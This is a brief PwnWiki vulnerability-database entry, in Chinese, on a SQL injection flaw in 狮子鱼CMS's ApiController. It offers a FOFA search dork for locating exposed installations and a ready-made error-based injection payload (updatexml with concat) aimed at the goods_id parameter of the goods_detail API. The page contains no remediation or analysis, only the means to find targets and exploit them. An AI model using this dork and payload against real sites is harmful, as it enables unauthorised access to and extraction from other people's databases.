Loading
0

狮子鱼CMS ApiController.class.php SQL注入漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

FOFA

"/seller.php?s=/Public/login"

Payload

https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)

免费、自由、人人可编辑的漏洞库--pwnwiki.com